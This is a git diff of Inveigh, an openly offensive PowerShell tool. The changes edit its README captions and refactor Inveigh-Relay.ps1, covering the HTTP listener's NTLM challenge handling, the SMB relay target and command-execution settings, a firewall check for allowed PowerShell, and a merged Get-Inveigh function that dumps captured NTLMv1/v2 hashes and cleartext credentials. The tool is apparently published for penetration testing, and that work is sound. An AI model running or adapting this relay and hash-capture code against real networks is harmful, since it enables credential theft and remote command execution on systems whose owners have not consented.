-Retrieval of captured NTLM2 challenge/response hashes with Get-InveighNTLMv2
-![inveigh2](https://cloud.githubusercontent.com/assets/5897462/10326313/abde41d8-6c67-11e5-91b8-0c55271ba326.png)
-
-HTTP to SMB Relay
-![inveigh3](https://cloud.githubusercontent.com/assets/5897462/10326314/b2de540a-6c67-11e5-8627-fe5d27018dc3.png)
-
-Module import and execution through one of Ben Turner and Dave Hardy's Metasploit Interactive PowerShell Session payloads
-![inveigh5](https://cloud.githubusercontent.com/assets/5897462/10354363/53e73784-6d2d-11e5-8509-9bb7f3feab88.png)
+##### Screenshot:
+![inveigh-support](https://cloud.githubusercontent.com/assets/5897462/18420531/b1858e2e-7842-11e6-9f03-0e86ee704211.png)
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
index e2745a6..f766b71 100644
--- a/Scripts/Inveigh-Relay.ps1
+++ b/Scripts/Inveigh-Relay.ps1
@@ -22,23 +22,23 @@ the local store and attached to port 443. If the script does not exit gracefully
in the cert store.
.PARAMETER HTTPSCertAppID
-Specify a valid application GUID for use with the ceriticate.
+Valid application GUID for use with the ceriticate.
.PARAMETER HTTPSCertThumbprint
-Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in
-the current working directory and named Inveigh.pfx.
+Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current
+working directory and named Inveigh.pfx.
.PARAMETER Challenge
-Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a
-random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be
+Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
+challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be
pulled from the SMB relay target.
.PARAMETER MachineAccounts
Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
.PARAMETER WPADAuth
-Default = NTLM: (Anonymous,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting
-to Anonymous can prevent browser login prompts.
+Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
+Anonymous can prevent browser login prompts.
.PARAMETER SMBRelayTarget
IP address of system to target for SMB relay.
@@ -51,11 +51,12 @@ Default = All Usernames: Comma separated list of usernames to use for relay atta
domain\username format.
.PARAMETER SMBRelayAutoDisable
-Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target.
+Default = Enable: (Y/N) Enable/Disable automaticaly disabling SMB relay after a successful command execution on
+target.
.PARAMETER SMBRelayNetworkTimeout
-Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay
-target after each packet is sent.
+Default = No Timeout: (Integer) Duration in seconds that Inveigh will wait for a reply from the SMB relay target
+after each packet is sent.
.PARAMETER ConsoleOutput
Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to
@@ -73,11 +74,11 @@ running Inveigh Relay through a shell that does not return other output streams.
various yellow warning messages if enabled.
.PARAMETER OutputDir
-Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must
-also be enabled.
+Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be
+enabled.
.PARAMETER RunTime
-(Integer) Set the run time duration in minutes.
+(Integer) Run time duration in minutes.
.PARAMETER ShowHelp
Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
@@ -101,26 +102,26 @@ https://github.com/Kevin-Robertson/Inveigh
[CmdletBinding()]
param
(
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelayAutoDisable="Y",
- [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth="NTLM",
- [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0",
- [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir="",
- [parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SMBRelayTarget ="",
- [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge="",
- [parameter(Mandatory=$false)][Array]$SMBRelayUsernames="",
- [parameter(Mandatory=$false)][Int]$SMBRelayNetworkTimeout="",
- [parameter(Mandatory=$false)][Int]$RunTime="",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelayAutoDisable = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
+ [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "",
+ [parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SMBRelayTarget = "",
+ [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
+ [parameter(Mandatory=$false)][Array]$SMBRelayUsernames = "",
+ [parameter(Mandatory=$false)][Int]$SMBRelayNetworkTimeout = "",
+ [parameter(Mandatory=$false)][Int]$RunTime = "",
[parameter(Mandatory=$true)][String]$SMBRelayCommand = "",
- [parameter(Mandatory=$false)][String]$HTTPSCertAppID="00112233-4455-6677-8899-AABBCCDDEEFF",
- [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint="98c1d54840c5c12ced710758b6ee56cc62fa1f0d",
+ [parameter(Mandatory=$false)][String]$HTTPSCertAppID = "00112233-4455-6677-8899-AABBCCDDEEFF",
+ [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint = "98c1d54840c5c12ced710758b6ee56cc62fa1f0d",
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
@@ -191,12 +192,6 @@ if(!$inveigh.running -or !$inveigh.unprivileged_running)
$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
$inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
- $inveigh.HTTP_response = $HTTPResponse
- $inveigh.HTTP_directory = $HTTPDir
- $inveigh.HTTP_default_file = $HTTPDefaultFile
- $inveigh.HTTP_default_exe = $HTTPDefaultEXE
- $inveigh.WPAD_response = $WPADResponse
- $inveigh.challenge = $Challenge
}
$inveigh.relay_running = $true
@@ -252,40 +247,48 @@ $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -
if($firewall_status)
{
$inveigh.status_queue.Add("Windows Firewall = Enabled") > $null
+
+ $firewall_rules = New-Object -comObject HNetCfg.FwPolicy2
+ $firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}"
+
+ if($firewall_powershell)
+ {
+ $inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed") > $null
+ }
}
if($HTTP -eq 'Y')
{
- $HTTP_port_check = netstat -ap TCP | findstr 0.0.0.0:80
+ $HTTP_port_check = netstat -anp TCP | findstr 0.0.0.0:80
if($HTTP_port_check)
{
- $inveigh.HTTP = $true
- $inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port 80") > $null
+ $inveigh.HTTP = $false
+ $inveigh.status_queue.Add("HTTP Capture/Relay Disabled Due To In Use Port 80") > $null
}
else
{
$inveigh.HTTP = $true
- $inveigh.status_queue.Add("HTTP Capture Enabled") > $null
+ $inveigh.status_queue.Add("HTTP Capture/Relay = Enabled") > $null
}
}
else
{
$inveigh.HTTP = $false
- $inveigh.status_queue.Add("HTTP Capture Disabled") > $null
+ $inveigh.status_queue.Add("HTTP Capture/Relay = Disabled") > $null
}
if($HTTPS -eq 'Y')
{
- $HTTPS_port_check = netstat -ap TCP | findstr 0.0.0.0:443
+ $HTTPS_port_check = netstat -anp TCP | findstr 0.0.0.0:443
if($HTTPS_port_check)
{
$inveigh.HTTP = $true
- $inveigh.status_queue.Add("HTTPS Capture Disabled Due To In Use Port 443") > $null
+ $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To In Use Port 443") > $null
}
else
{
@@ -303,14 +306,14 @@ if($HTTPS -eq 'Y')
$netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}"
$netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID)
& "netsh" $netsh_arguments > $null
- $inveigh.status_queue.Add("HTTPS Capture Enabled") > $null
+ $inveigh.status_queue.Add("HTTPS Capture/Relay = Enabled") > $null
}
catch
{
$certificate_store.Close()
$HTTPS="N"
$inveigh.HTTPS = $false
- $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error") > $null
+ $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To Certificate Install Error") > $null
}
}
@@ -318,7 +321,7 @@ if($HTTPS -eq 'Y')
}
else
{
- $inveigh.status_queue.Add("HTTPS Capture Disabled") > $null
+ $inveigh.status_queue.Add("HTTPS Capture/Relay = Disabled") > $null
}
if($inveigh.HTTP -or $inveigh.HTTPS)
@@ -326,7 +329,6 @@ if($inveigh.HTTP -or $inveigh.HTTPS)
if($Challenge)
{
- $Inveigh.challenge = $challenge
$inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null
}
@@ -344,9 +346,39 @@ if($inveigh.HTTP -or $inveigh.HTTPS)
}
+$inveigh.status_queue.Add("SMB Relay Target = $SMBRelayTarget") > $null
+
+if($SMBRelayUsernames)
+{
+
+ if($SMBRelayUsernames.Count -eq 1)
+ {
+ $inveigh.status_queue.Add("SMB Relay Username = " + ($SMBRelayUsernames -join ",")) > $null
+ }
+ else
+ {
+ $inveigh.status_queue.Add("SMB Relay Usernames = " + ($SMBRelayUsernames -join ",")) > $null
+ }
+
+}
+
+if($SMBRelayAutoDisable -eq 'Y')
+{
+ $inveigh.status_queue.Add("SMB Relay Auto Disable = Enabled") > $null
+}
+else
+{
+ $inveigh.status_queue.Add("SMB Relay Auto Disable = Disabled") > $null
+}
+
+if($SMBRelayNetworkTimeout)
+{
+ $inveigh.status_queue.Add("SMB Relay Network Timeout = $SMBRelayNetworkTimeout Seconds") > $null
+}
+
if($ConsoleOutput -eq 'Y')
{
- $inveigh.status_queue.Add("Real Time Console Output Enabled") > $null
+ $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null
$inveigh.console_output = $true
}
else
@@ -358,7 +390,7 @@ else
}
else
{
- $inveigh.status_queue.Add("Real Time Console Output Disabled") > $null
+ $inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null
}
}
@@ -375,14 +407,14 @@ if($FileOutput -eq 'Y')
$inveigh.file_output = $true
}
- $inveigh.status_queue.Add("Real Time File Output Enabled") > $null
+ $inveigh.status_queue.Add("Real Time File Output = Enabled") > $null
$inveigh.status_queue.Add("Output Directory = $output_directory") > $null
$inveigh.file_output = $true
}
else
{
- $inveigh.status_queue.Add("Real Time File Output Disabled") > $null
+ $inveigh.status_queue.Add("Real Time File Output = Disabled") > $null
}
if($RunTime -eq 1)
@@ -394,40 +426,8 @@ elseif($RunTime -gt 1)
$inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null
}
-$inveigh.status_queue.Add("SMB Relay Enabled") > $null
-$inveigh.status_queue.Add("SMB Relay Target = $SMBRelayTarget") > $null
-
-if($SMBRelayUsernames)
-{
-
- if($SMBRelayUsernames.Count -eq 1)
- {
- $inveigh.status_queue.Add("SMB Relay Username = " + $SMBRelayUsernames -join ",") > $null
- }
- else
- {
- $inveigh.status_queue.Add("SMB Relay Usernames = " + $SMBRelayUsernames -join ",") > $null
- }
-
-}
-
-if($SMBRelayAutoDisable -eq 'Y')
-{
- $inveigh.status_queue.Add("SMB Relay Auto Disable Enabled") > $null
-}
-else
-{
- $inveigh.status_queue.Add("SMB Relay Auto Disable Disabled") > $null
-}
-
-if($SMBRelayNetworkTimeout)
-{
- $inveigh.status_queue.Add("SMB Relay Network Timeout = $SMBRelayNetworkTimeout Seconds") > $null
-}
-
if($ShowHelp -eq 'Y')
{
- $inveigh.status_queue.Add("Use Get-Command -Noun Inveigh* to show available functions") > $null
$inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh-Relay") > $null
if($inveigh.console_output)
@@ -451,7 +451,7 @@ if($inveigh.status_output)
else
{
- switch ($inveigh.status_queue[0])
+ switch -Wildcard ($inveigh.status_queue[0])
{
"* Disabled Due To *"
@@ -1106,20 +1106,21 @@ $SMB_relay_execute_scriptblock =
# HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener
$HTTP_scriptblock =
{
- param ($SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$WPADAuth)
+ param ($Challenge,$SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$WPADAuth)
function NTLMChallengeBase64
{
+ param ([String]$Challenge)
$HTTP_timestamp = Get-Date
$HTTP_timestamp = $HTTP_timestamp.ToFileTime()
$HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
$HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- if($Inveigh.challenge)
+ if($Challenge)
{
- $HTTP_challenge = $Inveigh.challenge
- $HTTP_challenge_bytes = $Inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
+ $HTTP_challenge = $Challenge
+ $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
$HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
}
else
@@ -1266,13 +1267,13 @@ $HTTP_scriptblock =
}
else
{
- $NTLM = NTLMChallengeBase64
+ $NTLM = NTLMChallengeBase64 $Challenge
}
}
else
{
- $NTLM = NTLMChallengeBase64
+ $NTLM = NTLMChallengeBase64 $Challenge
}
$inveigh.response.StatusCode = 401
@@ -1584,7 +1585,7 @@ function HTTPListener()
$HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null
$HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
$HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
- $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument(
+ $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument(
$SMBRelayTarget).AddArgument($SMBRelayCommand).AddArgument($SMBRelayUsernames).AddArgument(
$SMBRelayAutoDisable).AddArgument($SMBRelayNetworkTimeout).AddArgument($WPADAuth) > $null
$HTTP_powershell.BeginInvoke() > $null
@@ -1697,213 +1698,163 @@ if($inveigh.console_output)
function Stop-Inveigh
{
- <#
- .SYNOPSIS
- Stop-Inveigh will stop all running Inveigh functions.
- #>
+<#
+.SYNOPSIS
+Stop-Inveigh will stop all running Inveigh functions.
+#>
+
+if($inveigh)
+{
- if($inveigh)
+ if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
{
- if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
+
+ if($inveigh.HTTP_listener.IsListening)
{
+ $inveigh.HTTP_listener.Stop()
+ $inveigh.HTTP_listener.Close()
+ }
+
+ if($inveigh.unprivileged_running)
+ {
+ $inveigh.unprivileged_running = $false
+ Start-Sleep -s 5
+ Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')")
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null
- if($inveigh.HTTP_listener.IsListening)
+ if($inveigh.file_output)
{
- $inveigh.HTTP_listener.Stop()
- $inveigh.HTTP_listener.Close()
+ "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append
}
-
- if($inveigh.unprivileged_running)
- {
- $inveigh.unprivileged_running = $false
- Write-Output("$(Get-Date -format 's') - Attempting to stop HTTP listener")
- $inveigh.HTTP_listener.server.blocking = $false
- Start-Sleep -s 1
- $inveigh.HTTP_listener.server.Close()
- Start-Sleep -s 1
- $inveigh.HTTP_listener.Stop()
- Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null
-
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append
- }
- }
+ }
- if($inveigh.relay_running)
+ if($inveigh.relay_running)
+ {
+ $inveigh.relay_running = $false
+ Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
+
+ if($inveigh.file_output)
{
- $inveigh.relay_running = $false
- Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
+ "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
+ }
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
- }
+ }
- }
+ if($inveigh.running)
+ {
+ $inveigh.running = $false
+ Write-Output("Inveigh exited at $(Get-Date -format 's')")
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
- if($inveigh.running)
+ if($inveigh.file_output)
{
- $inveigh.running = $false
- Write-Output("Inveigh exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
+ "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
+ }
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
- }
+ }
- }
+ }
+ else
+ {
+ Write-Output("There are no running Inveigh functions")
+ }
+
+ if($inveigh.HTTPS)
+ {
+ & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
- }
- else
+ try
{
- Write-Output("There are no running Inveigh functions")
+ $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+ $certificate_store.Open('ReadWrite')
+ $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0]
+ $certificate_store.Remove($certificate)
+ $certificate_store.Close()
}
-
- if($inveigh.HTTPS)
+ catch
{
- & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
+ Write-Output("SSL Certificate Deletion Error - Remove Manually")
+ $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
- try
+ if($inveigh.file_output)
{
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0]
- $certificate_store.Remove($certificate)
- $certificate_store.Close()
+ "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
}
- catch
- {
- Write-Output("SSL Certificate Deletion Error - Remove Manually")
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
- }
-
- }
}
-
- $inveigh.HTTP = $false
- $inveigh.HTTPS = $false
- }
- else
- {
- Write-Output("There are no running Inveigh functions")|Out-Null
}
-}
-
-function Stop-Inveigh
+ $inveigh.HTTP = $false
+ $inveigh.HTTPS = $false
+}
+else
{
- <#
- .SYNOPSIS
- Stop-Inveigh will stop all running Inveigh functions.
- #>
-
- if($inveigh)
- {
- if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
- {
+ Write-Output("There are no running Inveigh functions")|Out-Null
+}
- if($inveigh.HTTP_listener.IsListening)
- {
- $inveigh.HTTP_listener.Stop()
- $inveigh.HTTP_listener.Close()
- }
-
- if($inveigh.unprivileged_running)
- {
- $inveigh.unprivileged_running = $false
- Start-Sleep -s 5
- Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null
+}
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append
- }
+function Get-Inveigh
+{
+<#
+.SYNOPSIS
+Get-Inveigh will get stored Inveigh data from memory.
- }
-
- if($inveigh.relay_running)
- {
- $inveigh.relay_running = $false
- Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
+.PARAMETER Console
+Get queued console output. This is also the default if no parameters are set.
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
- }
+.PARAMETER Log
+Get log entries.
- }
+.PARAMETER NTLMv1
+Get captured NTLMv1 challenge/response hashes.
- if($inveigh.running)
- {
- $inveigh.running = $false
- Write-Output("Inveigh exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
+.PARAMETER NTLMv1Unique
+Get the first captured NTLMv1 challenge/response for each unique account.
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
- }
+.PARAMETER NTLMv1Usernames
+Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
- }
+.PARAMETER NTLMv2
+Get captured NTLMv1 challenge/response hashes.
- }
- else
- {
- Write-Output("There are no running Inveigh functions")
- }
-
- if($inveigh.HTTPS)
- {
- & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
+.PARAMETER NTLMv2Unique
+Get the first captured NTLMv2 challenge/response for each unique account.
- try
- {
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0]
- $certificate_store.Remove($certificate)
- $certificate_store.Close()
- }
- catch
- {
- Write-Output("SSL Certificate Deletion Error - Remove Manually")
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
+.PARAMETER NTLMv2Usernames
+Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
- }
+.PARAMETER Cleartext
+Get captured cleartext credentials.
- }
- }
+.PARAMETER CleartextUnique
+Get unique captured cleartext credentials.
- $inveigh.HTTP = $false
- $inveigh.HTTPS = $false
- }
- else
- {
- Write-Output("There are no running Inveigh functions")|Out-Null
- }
+.PARAMETER Learning
+Get valid hosts discovered through spoofer learning.
+#>
-}
+[CmdletBinding()]
+param
+(
+ [parameter(Mandatory=$false)][Switch]$Console,
+ [parameter(Mandatory=$false)][Switch]$Log,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
+ [parameter(Mandatory=$false)][Switch]$Cleartext,
+ [parameter(Mandatory=$false)][Switch]$CleartextUnique,
+ [parameter(Mandatory=$false)][Switch]$Learning,
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
-function Get-Inveigh
+if($Console -or $PSBoundParameters.Count -eq 0)
{
- <#
- .SYNOPSIS
- Get-Inveigh will display queued Inveigh console output.
- #>
while($inveigh.console_queue.Count -gt 0)
{
@@ -1962,279 +1913,200 @@ function Get-Inveigh
}
-function Get-InveighCleartext
+if($Log)
{
- <#
- .SYNOPSIS
- Get-InveighCleartext will get all captured cleartext credentials.
-
- .PARAMETER Unique
- Display only unique cleartext credentials.
- #>
-
- param
- (
- [parameter(Mandatory=$false)][Switch]$Unique,
- [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter
- )
-
- if($Unique)
- {
- Write-Output $inveigh.cleartext_list | Get-Unique
- }
- else
- {
- Write-Output $inveigh.cleartext_list
- }
-
+ Write-Output $inveigh.log
}
-function Get-InveighNTLMv1
+if($NTLMv1)
{
- <#
- .SYNOPSIS
- Get-InveighNTLMv1 will get captured NTLMv1 challenge/response hashes.
-
- .PARAMETER Unique
- Display only the first captured challenge/response for each unique account.
-
- .PARAMETER Usernames
- Display IP addresses and usernames for captured NTLMv2 challenge response hashes.
- #>
-
- param
- (
- [parameter(Mandatory=$false)][Switch]$Unique,
- [parameter(Mandatory=$false)][Switch]$Usernames,
- [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
- )
-
- if ($invalid_parameter)
- {
- throw "$($invalid_parameter) is not a valid parameter."
- }
+ Write-Output $inveigh.NTLMv1_list
+}
- if($Unique -and $Usernames)
- {
- throw "Cannot use -Unique with -Usernames."
- }
+if($NTLMv1Unique)
+{
+ $inveigh.NTLMv1_list.Sort()
- if($Unique)
+ foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
{
- $inveigh.NTLMv1_list.Sort()
+ $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
- foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+ if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
{
- $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
-
- if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
- {
- Write-Output $unique_NTLMv1
- }
-
- $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ Write-Output $unique_NTLMv1
}
- }
- elseif($Usernames)
- {
- Write-Output $inveigh.NTLMv1_username_list
- }
- else
- {
- Write-Output $inveigh.NTLMv1_list
+
+ $unique_NTLMv1_account_last = $unique_NTLMv1_account
}
}
-function Get-InveighNTLMv2
+if($NTLMv1Usernames)
{
- <#
- .SYNOPSIS
- Get-InveighNTLMv2 will get captured NTLMv2 challenge/response hashes.
-
- .PARAMETER Unique
- Display only the first captured challenge/response for each unique account.
+ Write-Output $inveigh.NTLMv2_username_list
+}
- .PARAMETER Usernames
- Display IP addresses and usernames for captured NTLMv2 challenge response hashes.
- #>
+if($NTLMv2)
+{
+ Write-Output $inveigh.NTLMv2_list
+}
- param
- (
- [parameter(Mandatory=$false)][Switch]$Unique,
- [parameter(Mandatory=$false)][Switch]$Usernames,
- [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
- )
+if($NTLMv2Unique)
+{
+ $inveigh.NTLMv2_list.Sort()
- if($invalid_parameter)
+ foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
{
- throw "$($invalid_parameter) is not a valid parameter."
- }
+ $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
- if($Unique -and $Usernames)
- {
- throw "Cannot use -Unique with -Usernames."
- }
+ if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ {
+ Write-Output $unique_NTLMv2
+ }
- if($Unique)
- {
- $inveigh.NTLMv2_list.Sort()
+ $unique_NTLMv2_account_last = $unique_NTLMv2_account
+ }
- foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
- {
- $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+}
- if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
- {
- Write-Output $unique_NTLMv2
- }
+if($NTLMv2Usernames)
+{
+ Write-Output $inveigh.NTLMv2_username_list
+}
- $unique_NTLMv2_account_last = $unique_NTLMv2_account
- }
- }
- elseif($Usernames)
- {
